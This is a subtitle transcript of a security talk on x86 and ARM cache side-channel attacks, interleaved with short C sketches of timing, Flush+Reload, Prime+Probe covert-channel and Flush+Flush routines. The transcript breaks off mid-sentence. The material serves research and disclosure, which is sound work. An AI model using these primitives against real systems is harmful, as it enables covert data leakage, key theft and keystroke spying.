1
00:00:00,000 --> 00:00:13,245
Music
2
00:00:13,245 --> 00:00:17,060
Herald Angel: We are here with a motto,
and the motto of this year is "Works For
3
00:00:17,060 --> 00:00:21,670
Me" and I think, how many
people in here are programmers? Raise
4
00:00:21,670 --> 00:00:28,700
your hands or shout or... Whoa, that's a
lot. Okay. So I think many of you will
5
00:00:28,700 --> 00:00:38,990
work on x86. Yeah. And I think you assume
that it works, and that everything works
6
00:00:38,990 --> 00:00:48,150
as intended. And I mean: What could go
wrong? Our next talk, the first one today,
7
00:00:48,150 --> 00:00:52,290
will be by Clémentine Maurice, who
previously was here with RowhammerJS,
8
00:00:52,290 --> 00:01:01,740
something I would call scary, and Moritz
Lipp, who has worked on the ARMageddon
9
00:01:01,740 --> 00:01:09,820
exploit a while back. Okay, so for the
next talk I would like to hear a really warm
10
00:01:09,820 --> 00:01:14,460
applause for the speakers of the talk
"What could possibly go wrong
11
00:01:14,460 --> 00:01:17,280
with insert x86 instruction here?"
12
00:01:17,280 --> 00:01:18,375
Thank you.
13
00:01:18,375 --> 00:01:28,290
Applause
14
00:01:28,290 --> 00:01:32,530
Clémentine Maurice (CM): Well, thank you
all for being here this morning. Yes, this
15
00:01:32,530 --> 00:01:38,080
is our talk "What could possibly go wrong
with insert x86 instruction here". So
16
00:01:38,080 --> 00:01:42,850
just a few words about ourselves: So I'm
Clémentine Maurice, I got my PhD last year
17
00:01:42,850 --> 00:01:47,119
in computer science and I'm now working as
a postdoc at Graz University of Technology
18
00:01:47,119 --> 00:01:52,090
in Austria. You can reach me on Twitter or
by email, but there's also, I think, lots
19
00:01:52,090 --> 00:01:56,670
of time before the Congress is over.
Moritz Lipp (ML): Hi and my name is Moritz
20
00:01:56,670 --> 00:02:01,520
Lipp, I'm a PhD student at Graz University
of Technology and you can also reach me on
21
00:02:01,520 --> 00:02:06,679
Twitter or just after our talk and in the
next days.
22
00:02:06,679 --> 00:02:10,860
CM: So, about this talk: So, the title
says this is a talk about x86
23
00:02:10,860 --> 00:02:17,720
instructions, but this is not a talk about
software. Don't leave yet! I'm actually
24
00:02:17,720 --> 00:02:22,440
even assuming safe software and the point
that we want to make is that safe software
25
00:02:22,440 --> 00:02:27,390
does not mean safe execution and we have
information leakage because of the
26
00:02:27,390 --> 00:02:32,560
underlying hardware and this is what we're
going to talk about today. So we'll be
27
00:02:32,560 --> 00:02:36,819
talking about cache attacks, what are
they, what can we do with that and also a
28
00:02:36,819 --> 00:02:41,510
special kind of cache attack that we found
this year. So... doing cache attacks
29
00:02:41,510 --> 00:02:48,590
without memory accesses and how to use
that even to bypass kernel ASLR.
30
00:02:48,590 --> 00:02:53,129
So again, the title says this is a talk about
x86 instructions but this is even more
31
00:02:53,129 --> 00:02:58,209
global than that. We can also mount these
cache attacks on ARM and not only on the
32
00:02:58,209 --> 00:03:07,050
x86. So some of the examples that you will
see also apply to ARM. So today we'll
33
00:03:07,050 --> 00:03:11,420
have a bit of background, but actually
most of the background will come along
34
00:03:11,420 --> 00:03:19,251
the way, because this covers a really huge
chunk of our research, and we'll see
35
00:03:19,251 --> 00:03:24,209
mainly three instructions: So "mov" and
how we can perform these cache attacks,
36
00:03:24,209 --> 00:03:29,430
what are they... The instruction
"clflush", so here we'll be doing cache
37
00:03:29,430 --> 00:03:36,370
attacks without any memory accesses. Then
we'll see "prefetch" and how we can bypass
38
00:03:36,370 --> 00:03:43,420
kernel ASLR and lots of translations
levels, and then there's even a bonus
39
00:03:43,420 --> 00:03:48,950
track, so this will not be our own
work, but even more instructions and even
40
00:03:48,950 --> 00:03:54,210
more attacks.
Okay, so let's start with a bit of an
41
00:03:54,210 --> 00:04:01,190
introduction. So we will be mainly
focusing on Intel CPUs, and this is
42
00:04:01,190 --> 00:04:05,599
roughly what it looks like today in terms
of cores and caches. So we have different
43
00:04:05,599 --> 00:04:09,440
different cores, so here four cores,
and different levels
44
00:04:09,440 --> 00:04:14,220
of caches. So here usually we have three
levels of caches. We have level 1 and
45
00:04:14,220 --> 00:04:18,269
level 2 that are private to each core,
which means that core 0 can only access
46
00:04:18,269 --> 00:04:24,520
its level 1 and its level 2 and not level
1 and level 2 of, for example, core 3, and
47
00:04:24,520 --> 00:04:30,130
we have the last level cache... so here if
you can see the pointer... So this one is
48
00:04:30,130 --> 00:04:36,289
divided in slices so we have as many
slices as cores, so here 4 slices, but all
49
00:04:36,289 --> 00:04:40,659
the slices are shared across cores, so core
0 can access the whole last level cache,
50
00:04:40,659 --> 00:04:48,669
that's slices 0, 1, 2 and 3. We also have a nice
property on Intel CPUs, which is that this level
51
00:04:48,669 --> 00:04:52,280
of cache is inclusive, and what it means
is that everything that is contained in
52
00:04:52,280 --> 00:04:56,889
level 1 and level 2 will also be contained
in the last level cache, and this will
53
00:04:56,889 --> 00:05:01,439
prove to be quite useful for cache
attacks.
54
00:05:01,439 --> 00:05:08,430
So today we mostly have set associative
caches. What it means is that we have data
55
00:05:08,430 --> 00:05:13,249
that is loaded in specific sets and that
depends only on its address. So we have
56
00:05:13,249 --> 00:05:18,900
some bits of the address that give us the
index and that says "Ok the line is going
57
00:05:18,900 --> 00:05:24,610
to be loaded in this cache set", so this
is a cache set. Then we have several ways
58
00:05:24,610 --> 00:05:30,629
per set, so here we have 4 ways, and the
cache line is going to be loaded in a
59
00:05:30,629 --> 00:05:35,270
specific way and that will only depend on
the replacement policy and not on the
60
00:05:35,270 --> 00:05:40,800
address itself, so when you load a line
into the cache, usually the cache is
61
00:05:40,800 --> 00:05:44,830
already full and you have to make room for
a new line. So this is where the
62
00:05:44,830 --> 00:05:49,729
replacement policy comes in: what it
does is say, ok, I'm going to
63
00:05:49,729 --> 00:05:57,779
remove this line to make room for the next
line. So for today we're going to see only
64
00:05:57,779 --> 00:06:01,960
three instructions, as I've been telling
you. So the mov instruction, it does a
65
00:06:01,960 --> 00:06:06,610
lot of things, but the only aspect that
we're interested in is that it can
66
00:06:06,610 --> 00:06:12,809
access data in the main memory.
We're going to see clflush: what it does
67
00:06:12,809 --> 00:06:18,349
is that it removes a cache line from the
cache, from the whole cache. And we're
68
00:06:18,349 --> 00:06:25,569
going to see prefetch, it prefetches a
cache line for future use. So we're going
69
00:06:25,569 --> 00:06:30,520
to see what they do and the kind of side
effects that they have and all the attacks
70
00:06:30,520 --> 00:06:34,800
that we can do with them. And that's
basically all the examples you need for
71
00:06:34,800 --> 00:06:39,830
today, so even if you're not an expert on
x86, don't worry, it's not just slides full
72
00:06:39,830 --> 00:06:44,899
of assembly and stuff. Okay so on to the
first one.
73
00:06:44,899 --> 00:06:49,940
ML: So we will first start with the 'mov'
instruction and actually the first slide
74
00:06:49,940 --> 00:06:57,809
is full of code. However, as you can see
the mov instruction is used to move data
75
00:06:57,809 --> 00:07:02,629
from registers to registers, from the main
memory and back to the main memory and as
76
00:07:02,629 --> 00:07:07,240
you can see there are many moves you can
use but basically it's just to move data
77
00:07:07,240 --> 00:07:12,589
and that's all we need to know. In
addition, a lot of exceptions can occur so
78
00:07:12,589 --> 00:07:18,139
we can assume that those restrictions are
so tight that nothing can go wrong when
79
00:07:18,139 --> 00:07:22,210
you just move data because moving data is
simple.
80
00:07:22,210 --> 00:07:27,879
However, while there are a lot of
exceptions, the data that is accessed is
81
00:07:27,879 --> 00:07:35,009
always loaded into the cache, so data is
in the cache and this is transparent to
82
00:07:35,009 --> 00:07:40,870
the program that is running. However,
there are side-effects when you run these
83
00:07:40,870 --> 00:07:46,219
instructions, and we will see how they
look like with the mov instruction. So you
84
00:07:46,219 --> 00:07:51,289
probably all know that data can either be
in CPU registers, in the different levels
85
00:07:51,289 --> 00:07:56,029
of the cache that Clementine showed to you
earlier, in the main memory, or on the
86
00:07:56,029 --> 00:08:02,219
disk, and depending on where the memory
and the data is located it needs a longer
87
00:08:02,219 --> 00:08:09,689
time to be loaded back to the CPU, and
this is what we can see in this plot. So
88
00:08:09,689 --> 00:08:15,739
we try here to measure the access time of
an address over and over again, assuming
89
00:08:15,739 --> 00:08:21,759
that when we access it more often, it is
already stored in the cache. So around 70
90
00:08:21,759 --> 00:08:27,289
cycles: most of the time we can assume
that when we load an address and it takes 70
91
00:08:27,289 --> 00:08:34,809
cycles, it's loaded into the cache.
However, when we assume that the data is
92
00:08:34,809 --> 00:08:39,659
loaded from the main memory, we can
clearly see that it needs a much longer
93
00:08:39,659 --> 00:08:46,720
time like a bit more than 200 cycles. So
depending when we measure the time it
94
00:08:46,720 --> 00:08:51,470
takes to load the address we can say the
data has been loaded to the cache or the
95
00:08:51,470 --> 00:08:58,339
data is still located in the main memory.
And this property is what we can exploit
96
00:08:58,339 --> 00:09:05,339
using cache attacks. So we measure the
timing differences on memory accesses. And
97
00:09:05,339 --> 00:09:09,940
what an attacker does is he monitors the
cache lines, but he has no way to know
98
00:09:09,940 --> 00:09:14,459
what's actually the content of the cache
line. So we can only monitor that this
99
00:09:14,459 --> 00:09:20,099
cache line has been accessed and not
what's actually stored in the cache line.
100
00:09:20,099 --> 00:09:24,411
And what you can do with this is you can
implement covert channels, so you can
101
00:09:24,411 --> 00:09:29,580
allow two processes to communicate with
each other evading the permission system
102
00:09:29,580 --> 00:09:35,060
which we will see later on. In addition you
can also do side channel attacks, so you
103
00:09:35,060 --> 00:09:40,600
can spy with a malicious attacking
application on benign processes, and you
104
00:09:40,600 --> 00:09:46,140
can use this to steal cryptographic keys
or to spy on keystrokes.
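The timing measurement described above can be sketched in C. This is an illustrative sketch, not the speakers' code: the use of rdtscp for timing and clflush for eviction, and the single-sample measurement, are simplifying assumptions about a typical Intel setup.

```c
#include <stdint.h>
#include <x86intrin.h>   /* __rdtscp, _mm_clflush, _mm_mfence */

static uint8_t probe_buf[64];          /* one cache-line-sized buffer */

/* Time a single read of *addr in CPU cycles. A real attack would
 * serialize more carefully and average over many samples. */
static uint64_t time_access(volatile uint8_t *addr) {
    unsigned aux;
    uint64_t start = __rdtscp(&aux);
    (void)*addr;                       /* the memory access we measure */
    return __rdtscp(&aux) - start;
}

/* Measure a cache hit and a cache miss on the same address. */
static void hit_vs_miss(uint64_t *hit, uint64_t *miss) {
    volatile uint8_t *p = probe_buf;
    (void)*p;                          /* warm up: line is now cached */
    *hit = time_access(p);             /* fast: served from the cache */
    _mm_clflush(probe_buf);            /* evict the line from all levels */
    _mm_mfence();
    *miss = time_access(p);            /* slow: fetched from main memory */
}
```

On the Intel machines in the talk, the hit lands around 70 cycles and the miss above 200; the exact numbers depend on the microarchitecture.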
105
00:09:46,140 --> 00:09:53,649
And basically we have different types of
cache attacks and I want to explain the
106
00:09:53,649 --> 00:09:58,810
most popular one, the "Flush+Reload"
attack, in the beginning. So on the left,
107
00:09:58,810 --> 00:10:03,110
you have the address space of the victim,
and on the right you have the address
108
00:10:03,110 --> 00:10:08,560
space of the attacker who maps a shared
library—an executable—that the victim is
109
00:10:08,560 --> 00:10:14,899
using into its own address space, like
the red rectangle. And this means that
110
00:10:14,899 --> 00:10:22,760
when this data is stored in the cache,
it's cached for both processes. Now the
111
00:10:22,760 --> 00:10:28,170
attacker can use the flush instruction to
remove the data out of the cache, so it's
112
00:10:28,170 --> 00:10:34,420
not in the cache anymore, so it's also not
cached for the victim. Now the attacker
113
00:10:34,420 --> 00:10:39,100
can schedule the victim and if the victim
decides "yeah, I need this data", it will
114
00:10:39,100 --> 00:10:44,970
be loaded back into the cache. And now the
attacker can reload the data, measure the
115
00:10:44,970 --> 00:10:49,661
time it took, and then decide
"okay, the victim has accessed the data in
116
00:10:49,661 --> 00:10:54,179
the meantime" or "the victim has not
accessed the data in the meantime." And by
117
00:10:54,179 --> 00:10:58,959
that you can spy if this address has been
used.
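A single round of the Flush+Reload loop just described might look like this in C. A hedged sketch: the 150-cycle threshold is a placeholder that would have to be calibrated per machine, and a real spy runs this in a loop around the victim's execution.

```c
#include <stdint.h>
#include <x86intrin.h>   /* _mm_clflush, _mm_mfence, __rdtscp */

#define THRESHOLD 150    /* cycles; machine-dependent, must be calibrated */

/* One Flush+Reload round on an address shared with the victim.
 * Returns 1 if the reload was fast, i.e. the victim touched the
 * line between our flush and our reload. */
static int flush_reload(volatile uint8_t *addr) {
    unsigned aux;
    _mm_clflush((const void *)addr);   /* flush the shared line */
    _mm_mfence();
    /* ... here the victim gets scheduled and may access *addr ... */
    uint64_t start = __rdtscp(&aux);
    (void)*addr;                       /* reload */
    uint64_t delta = __rdtscp(&aux) - start;
    return delta < THRESHOLD;          /* fast reload = victim accessed it */
}
```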
118
00:10:58,959 --> 00:11:03,240
The second type of attack is called
"Prime+Probe" and it does not rely on the
119
00:11:03,240 --> 00:11:08,971
shared memory like the "Flush+Reload"
attack, and it works as follows: Instead
120
00:11:08,971 --> 00:11:16,139
of mapping anything into its own address
space, the attacker loads a lot of data
121
00:11:16,139 --> 00:11:24,589
into one cache set, here, and fills the
set. Now he again schedules the victim
122
00:11:24,589 --> 00:11:31,820
and the victim can access data that maps
to the same cache set.
123
00:11:31,820 --> 00:11:38,050
So the cache set is used by the attacker
and the victim at the same time. Now the
124
00:11:38,050 --> 00:11:43,050
attacker can start measuring the access
time to the addresses he loaded into the
125
00:11:43,050 --> 00:11:49,050
cache before, and when he accesses an
address that is still in the cache it's
126
00:11:49,050 --> 00:11:55,649
faster, so he measures a lower time. And
if it's not in the cache anymore it has to
127
00:11:55,649 --> 00:12:01,279
be reloaded into the cache so it takes a
longer time. He can sum this up and detect
128
00:12:01,279 --> 00:12:07,870
if the victim has loaded data into the
cache as well. So the first thing we want
129
00:12:07,870 --> 00:12:11,900
to show you is what you can do with cache
attacks is you can implement a covert
130
00:12:11,900 --> 00:12:17,439
channel and this could be happening in the
following scenario.
131
00:12:17,439 --> 00:12:23,610
You install an app on your phone to view
your favorite images you take, to apply
132
00:12:23,610 --> 00:12:28,630
some filters, and in the end you don't
know that it's malicious because the only
133
00:12:28,630 --> 00:12:33,609
permission it requires is to access your
images which makes sense. So you can
134
00:12:33,609 --> 00:12:38,700
easily install it without any fear. In
addition you want to know what the weather
135
00:12:38,700 --> 00:12:43,040
is outside, so you install a nice little
weather widget, and the only permission it
136
00:12:43,040 --> 00:12:48,230
has is to access the internet because it
has to load the information from
137
00:12:48,230 --> 00:12:55,569
somewhere. So what happens if you're able
to implement a covert channel between
138
00:12:55,569 --> 00:12:59,779
these two applications, without any
permissions and privileges so they can
139
00:12:59,779 --> 00:13:05,060
communicate with each other without using
any mechanisms provided by the operating
140
00:13:05,060 --> 00:13:11,149
system, so it's hidden. It can happen that
now the gallery app can send the image to
141
00:13:11,149 --> 00:13:18,680
the internet, it will be uploaded and
exposed for everyone. So maybe you don't
142
00:13:18,680 --> 00:13:25,610
want to see the cat picture everywhere.
Well, we can do this with those
143
00:13:25,610 --> 00:13:30,219
Prime+Probe or Flush+Reload attacks, we will
discuss a covert channel using
144
00:13:30,219 --> 00:13:35,690
Prime+Probe. So how can we transmit this
data? We need to transmit ones and zeros
145
00:13:35,690 --> 00:13:40,980
at some point. So the sender and the
receiver agree on one cache set that they
146
00:13:40,980 --> 00:13:49,319
both use. The receiver probes the set all
the time. When the sender wants to
147
00:13:49,319 --> 00:13:57,529
transmit a zero he just does nothing, so
the lines of the receiver are in the cache
148
00:13:57,529 --> 00:14:01,809
all the time, and he knows "okay, he's
sending nothing", so it's a zero.
149
00:14:01,809 --> 00:14:05,940
On the other hand if the sender wants to
transmit a one, he starts accessing
150
00:14:05,940 --> 00:14:10,800
addresses that map to the same cache set
so it will take a longer time for the
151
00:14:10,800 --> 00:14:16,540
receiver to access its addresses again,
and he knows "okay, the sender just sent
152
00:14:16,540 --> 00:14:23,059
me a one", and Clementine will show you
what you can do with this covert channel.
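The sender and receiver logic can be sketched in C as follows. This is a toy illustration, not the actual tool: the WAYS and STRIDE values, and the shortcut of using equal page offsets to land in the same cache set, are assumptions; real attacks construct proper eviction sets for the agreed set.

```c
#include <stdint.h>
#include <x86intrin.h>   /* __rdtscp */

#define WAYS 16          /* assumed associativity of the target cache set */
#define STRIDE 4096      /* page stride keeps the set-index bits identical */

static uint8_t pool[WAYS * STRIDE];

/* Prime: fill the agreed-upon cache set with our own lines. */
static void prime_set(void) {
    for (int i = 0; i < WAYS; i++)
        (void)*(volatile uint8_t *)&pool[i * STRIDE];
}

/* Probe: re-access the primed addresses and time them. A high
 * total time means the sender evicted our lines, i.e. sent a 1;
 * a low time means the sender stayed idle, i.e. sent a 0. */
static uint64_t probe_set(void) {
    unsigned aux;
    uint64_t start = __rdtscp(&aux);
    for (int i = 0; i < WAYS; i++)
        (void)*(volatile uint8_t *)&pool[i * STRIDE];
    return __rdtscp(&aux) - start;
}
```

The sender's side is symmetric: to send a 1 it accesses its own addresses mapping to the same set; to send a 0 it does nothing.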
153
00:14:23,059 --> 00:14:25,180
CM: So the really nice thing about
154
00:14:25,180 --> 00:14:28,959
Prime+Probe is that it has really low
requirements. It doesn't need any kind of
155
00:14:28,959 --> 00:14:34,349
shared memory. For example if you have two
virtual machines you could have some
156
00:14:34,349 --> 00:14:38,700
shared memory via memory deduplication.
The thing is that this is highly insecure,
157
00:14:38,700 --> 00:14:43,969
so cloud providers like Amazon EC2, they
disable that. Now we can still use
158
00:14:43,969 --> 00:14:50,429
Prime+Probe because it doesn't need this
shared memory. Another problem with cache
159
00:14:50,429 --> 00:14:54,999
covert channels is that they are quite
noisy. So when you have other applications
160
00:14:54,999 --> 00:14:59,259
that are also running on the system, they
are all competing for the cache and they
161
00:14:59,259 --> 00:15:03,009
might evict some cache lines,
especially if it's an application that is
162
00:15:03,009 --> 00:15:08,749
very memory intensive. And you also have
noise due to the fact that the sender and
163
00:15:08,749 --> 00:15:12,770
the receiver might not be scheduled at the
same time. So if you have your sender that
164
00:15:12,770 --> 00:15:16,649
sends all the things and the receiver is
not scheduled then some part of the
165
00:15:16,649 --> 00:15:22,539
transmission can get lost. So what we did
is we tried to build an error-free covert
166
00:15:22,539 --> 00:15:30,829
channel. We took care of all these noise
issues by using some error detection to
167
00:15:30,829 --> 00:15:36,470
resynchronize the sender and the receiver
and then we use some error correction to
168
00:15:36,470 --> 00:15:40,779
correct the remaining errors.
So we managed to have a completely error-
169
00:15:40,779 --> 00:15:46,069
free covert channel even if you have a lot
of noise, so let's say another virtual
170
00:15:46,069 --> 00:15:54,119
machine also on the machine serving files
through a web server, also doing lots of
171
00:15:54,119 --> 00:16:01,600
memory-intensive tasks at the same time,
and the covert channel stayed completely
172
00:16:01,600 --> 00:16:07,610
error-free, and around 40 to 75 kilobytes
per second, which is still quite a lot.
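The talk doesn't detail the error-correcting code they used, but as a toy illustration of the error-correction half, a Hamming(7,4) code corrects any single flipped bit in each 4-bit chunk:

```c
#include <stdint.h>

/* Hamming(7,4): encode 4 data bits d3..d0 into 7 bits with 3
 * parity bits, so any single bit flip can be located and fixed. */
static uint8_t hamming_encode(uint8_t d) {
    uint8_t d0 = d & 1, d1 = (d >> 1) & 1, d2 = (d >> 2) & 1, d3 = (d >> 3) & 1;
    uint8_t p1 = d0 ^ d1 ^ d3;        /* covers positions 1,3,5,7 */
    uint8_t p2 = d0 ^ d2 ^ d3;        /* covers positions 2,3,6,7 */
    uint8_t p3 = d1 ^ d2 ^ d3;        /* covers positions 4,5,6,7 */
    /* bit positions 1..7 hold: p1 p2 d0 p3 d1 d2 d3 */
    return p1 | (p2 << 1) | (d0 << 2) | (p3 << 3) |
           (d1 << 4) | (d2 << 5) | (d3 << 6);
}

static uint8_t hamming_decode(uint8_t c) {
    uint8_t b[8];
    for (int i = 1; i <= 7; i++) b[i] = (c >> (i - 1)) & 1;
    /* recompute parities; the syndrome is the error position */
    uint8_t s1 = b[1] ^ b[3] ^ b[5] ^ b[7];
    uint8_t s2 = b[2] ^ b[3] ^ b[6] ^ b[7];
    uint8_t s3 = b[4] ^ b[5] ^ b[6] ^ b[7];
    int pos = s1 | (s2 << 1) | (s3 << 2);
    if (pos) b[pos] ^= 1;             /* correct the flipped bit */
    return b[3] | (b[5] << 1) | (b[6] << 2) | (b[7] << 3);
}
```

Error *detection* (to resynchronize sender and receiver) additionally needs something like sequence numbers or checksums on top of this.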
173
00:16:07,610 --> 00:16:14,470
All of this is between virtual machines on
Amazon EC2. And the really neat thing is, we
174
00:16:14,470 --> 00:16:19,389
wanted to do something with that, and
basically we managed to create an SSH
175
00:16:19,389 --> 00:16:27,060
connection really over the cache. So they
don't have any network between
176
00:16:27,060 --> 00:16:31,439
them, but just we are sending the zeros
and the ones and we have an SSH connection
177
00:16:31,439 --> 00:16:36,839
between them. So you could say that cache
covert channels are nothing serious, but I think
178
00:16:36,839 --> 00:16:43,079
it's a real threat. And if you want to
have more details about this work in
179
00:16:43,079 --> 00:16:49,220
particular, it will be published soon at
NDSS.
180
00:16:49,220 --> 00:16:54,040
So the second application that we wanted
to show you is that we can attack crypto
181
00:16:54,040 --> 00:17:01,340
with cache attacks. In particular we are
going to show an attack on AES and a
182
00:17:01,340 --> 00:17:04,990
special implementation of AES that uses
T-tables. So that's the fast software
183
00:17:04,990 --> 00:17:11,650
implementation because it uses some
precomputed lookup tables. It's known to
184
00:17:11,650 --> 00:17:17,490
be vulnerable to side-channel attacks
since 2006 by Osvik et al., and it's a one-
185
00:17:17,490 --> 00:17:24,110
round known plaintext attack, so you have
p—or plaintext—and k, your secret key. And
186
00:17:24,110 --> 00:17:29,570
the AES algorithm, what it does is compute
an intermediate state at each round r.
187
00:17:29,570 --> 00:17:38,559
And in the first round, the accessed table
indices are just p XOR k. Now it's a known
188
00:17:38,559 --> 00:17:43,500
plaintext attack, what this means is that
if you can recover the accessed table
189
00:17:43,500 --> 00:17:49,460
indices you've also managed to recover the
key because it's just XOR. So that would
190
00:17:49,460 --> 00:17:55,450
be bad, right, if we could recover these
accessed table indices. Well we can, with
191
00:17:55,450 --> 00:18:00,510
cache attacks! So we did that with
Flush+Reload and with Prime+Probe. On the
192
00:18:00,510 --> 00:18:05,809
x-axis you have the plaintext byte values
and on the y-axis you have the addresses
193
00:18:05,809 --> 00:18:15,529
which are essentially the T-table entries.
So a black cell means that we've monitored
194
00:18:15,529 --> 00:18:19,970
the cache line, and we've seen a lot of
cache hits. So basically the blacker it
195
00:18:19,970 --> 00:18:25,650
is, the more certain we are that the
T-Table entry has been accessed. And here
196
00:18:25,650 --> 00:18:31,779
it's a toy example, the key is all-zeros,
but you would basically just have a
197
00:18:31,779 --> 00:18:35,700
different pattern if the key was not all-
zeros, and as long as you can see this
198
00:18:35,700 --> 00:18:43,409
nice diagonal or a pattern then you have
recovered the key. So it's an old attack,
199
00:18:43,409 --> 00:18:48,890
2006, it's been 10 years, everything
should be fixed by now, and you see where
200
00:18:48,890 --> 00:18:56,880
I'm going: it's not. So on Android the
Bouncy Castle implementation uses by
201
00:18:56,880 --> 00:19:03,360
default the T-table, so that's bad. Also
many implementations that you can find
202
00:19:03,360 --> 00:19:11,380
online use precomputed values, so maybe
be wary of this kind of attack. The
203
00:19:11,380 --> 00:19:17,240
last application we wanted to show you is
how we can spy on keystrokes.
204
00:19:17,240 --> 00:19:21,480
So for that we will use Flush+Reload
because it's a really fine-grained
205
00:19:21,480 --> 00:19:26,309
attack. We can see very precisely which
cache line has been accessed, and a cache
206
00:19:26,309 --> 00:19:31,440
line is only 64 bytes so it's really not a
lot and we're going to use that to spy on
207
00:19:31,440 --> 00:19:37,690
keystrokes and we even have a small demo
for you.
208
00:19:40,110 --> 00:19:45,640
ML: So what you can see on the screen, this
is not on Intel x86, it's on a smartphone,
209
00:19:45,640 --> 00:19:50,330
on the Galaxy S6, but you can also apply
these cache attacks there so that's what
210
00:19:50,330 --> 00:19:53,850
we want to emphasize.
So on the left you see the screen and on
211
00:19:53,850 --> 00:19:57,960
the right we have connected a shell with
no privileges and permissions, so it can
212
00:19:57,960 --> 00:20:00,799
basically be an app that you install
Glass bottle falling
213
00:20:00,799 --> 00:20:09,480
from the App Store and on the right we are
going to start our spy tool, and on the
214
00:20:09,480 --> 00:20:14,110
left we just open the messenger app and
whenever the user hits any key on the
215
00:20:14,110 --> 00:20:19,690
keyboard our spy tool takes care of that
and notices that. Also if he presses the
216
00:20:19,690 --> 00:20:26,120
spacebar we can also measure that. If the
user decides "ok, I want to delete the
217
00:20:26,120 --> 00:20:30,880
word" because he changed his mind, we can
also register if the user pressed the
218
00:20:30,880 --> 00:20:37,929
backspace button, so in the end we can see
exactly how long the words were that the user
219
00:20:37,929 --> 00:20:45,630
typed into his phone without any
permissions and privileges, which is bad.
220
00:20:45,630 --> 00:20:55,250
Laughs
Applause
221
00:20:55,250 --> 00:21:00,320
ML: So enough about the mov instruction,
let's head to clflush.
222
00:21:00,320 --> 00:21:07,230
CM: So the clflush instruction: What it
does is that it invalidates from every
223
00:21:07,230 --> 00:21:12,309
level the cache line that contains the
address that you pass to this instruction.
224
00:21:12,309 --> 00:21:16,990
So in itself it's kind of bad because it
enables the Flush+Reload attacks that we
225
00:21:16,990 --> 00:21:21,300
showed earlier, that was just flush,
reload, and the flush part is done with
226
00:21:21,300 --> 00:21:29,140
clflush. But there's actually more to it,
how wonderful. So there's a first timing
227
00:21:29,140 --> 00:21:33,320
leakage with it, so we're going to see
that the clflush instruction has a
228
00:21:33,320 --> 00:21:37,890
different timing depending on whether the
data that you pass to it is
229
00:21:37,890 --> 00:21:44,710
cached or not. So imagine you have a cache
line that is in the level 1.
230
00:21:44,710 --> 00:21:50,299
With the inclusion property it has to be
also in the last level cache. Now this is
231
00:21:50,299 --> 00:21:54,350
quite convenient and this is also why we
have this inclusion property for
232
00:21:54,350 --> 00:22:00,019
performance reasons on Intel CPUs: if you
want to see if a line is present at all in
233
00:22:00,019 --> 00:22:04,209
the cache you just have to look in the
last level cache. So this is basically
234
00:22:04,209 --> 00:22:08,010
what the clflush instruction does. It goes
to the last level cache, sees "ok
235
00:22:08,010 --> 00:22:12,890
there's a line, I'm going to flush this
one" and then there's something that tells
236
00:22:12,890 --> 00:22:18,950
ok the line is also present somewhere else
so then it flushes the line in level 1
237
00:22:18,950 --> 00:22:26,390
and/or level 2. So that's slow. Now if you
perform clflush on some data that is not
238
00:22:26,390 --> 00:22:32,240
cached, basically it does the same, goes
to the last level cache, sees that there's
239
00:22:32,240 --> 00:22:36,659
no line and there can't be any... This
data can't be anywhere else in the cache
240
00:22:36,659 --> 00:22:41,269
because it would be in the last level
cache if it was anywhere, so it does
241
00:22:41,269 --> 00:22:47,430
nothing and it stops there. So that's fast.
So how exactly fast and slow am I talking
242
00:22:47,430 --> 00:22:53,760
about? So it's actually only a very few
cycles, so we did these experiments on
243
00:22:53,760 --> 00:22:59,072
different microarchitectures, so Sandy
Bridge, Ivy Bridge, and Haswell, and...
244
00:22:59,072 --> 00:23:03,250
So the different colors correspond to the
different microarchitectures. So the first
245
00:23:03,250 --> 00:23:07,880
thing that is already... kinda funny is
that you can see that you can distinguish
246
00:23:07,880 --> 00:23:14,649
the microarchitectures quite nicely with
this, but the real point is that you have
247
00:23:14,649 --> 00:23:20,280
really different zones.
The solid line is when we performed the
248
00:23:20,280 --> 00:23:25,200
measurement on clflush with the line that
was already in the cache, and the dashed
249
00:23:25,200 --> 00:23:30,840
line is when the line was not in the
cache, and in all microarchitectures you
250
00:23:30,840 --> 00:23:36,539
can see a difference: it's
only a few cycles, it's a bit noisy, so
251
00:23:36,539 --> 00:23:43,250
what could go wrong? Okay, so exploiting
these few cycles, we still managed to
252
00:23:43,250 --> 00:23:47,029
perform a new cache attack that we call
"Flush+Flush", so I'm going to explain
253
00:23:47,029 --> 00:23:52,220
that to you: So basically everything that
we could do with "Flush+Reload", we can
254
00:23:52,220 --> 00:23:56,899
also do with "Flush+Flush". We can perform
covert channels and side-channel attacks.
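Exploiting the clflush timing difference shown a moment ago, one Flush+Flush measurement can be sketched like this (again an illustrative sketch: rdtscp timing and the 100-cycle threshold are assumptions that would have to be calibrated per machine):

```c
#include <stdint.h>
#include <x86intrin.h>   /* _mm_clflush, __rdtscp */

#define FLUSH_THRESHOLD 100  /* cycles; machine-dependent, calibrate first */

/* One Flush+Flush round: the timed operation is the clflush itself.
 * A slow flush means the line was cached, i.e. the victim touched
 * it since our previous flush; the attacker never reloads the line,
 * so it performs no memory access of its own on it. */
static int flush_flush(const void *addr) {
    unsigned aux;
    uint64_t start = __rdtscp(&aux);
    _mm_clflush(addr);
    uint64_t delta = __rdtscp(&aux) - start;
    return delta > FLUSH_THRESHOLD;   /* 1 = line was in the cache */
}
```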
255
00:23:56,899 --> 00:24:01,090
It's stealthier than previous cache
attacks, I'm going to come back to this one,
256
00:24:01,090 --> 00:24:07,220
and it's also faster than previous cache
attacks. So how does it work exactly? So
257
00:24:07,220 --> 00:24:12,210
the principle is a bit similar to
"Flush+Reload": So we have the attacker
258
00:24:12,210 --> 00:24:16,131
and the victim that have some kind of
shared memory, let's say a shared library.
259
00:24:16,131 --> 00:24:21,340
It will be shared in the cache. The
attacker will start by flushing the cache
260
00:24:21,340 --> 00:24:26,510
line, then lets the victim perform
whatever it does, let's say encryption,
261
00:24:26,510 --> 00:24:32,120
the victim will load some data into the
cache, automatically, and now the attacker
262
00:24:32,120 --> 00:24:36,720
wants to know again if the victim accessed
this precise cache line and instead of
263
00:24:36,720 --> 00:24:43,540
reloading it, he is going to flush it again.
And since we have this timing difference
264
00:24:43,540 --> 00:24:47,040
depending on whether the data is in the
cache or not, it gives us the same
265
00:24:47,040 --> 00:24:54,889
information as if we reloaded it, except
it's way faster. So I talked about
266
00:24:54,889 --> 00:24:59,690
stealthiness. So the thing is that
basically these cache attacks and that
267
00:24:59,690 --> 00:25:06,340
also applies to "Rowhammer": They are
already stealthy in themselves, because
268
00:25:06,340 --> 00:25:10,470
there's no antivirus today that can detect
them. But some people thought that we
269
00:25:10,470 --> 00:25:14,351
could detect them with performance
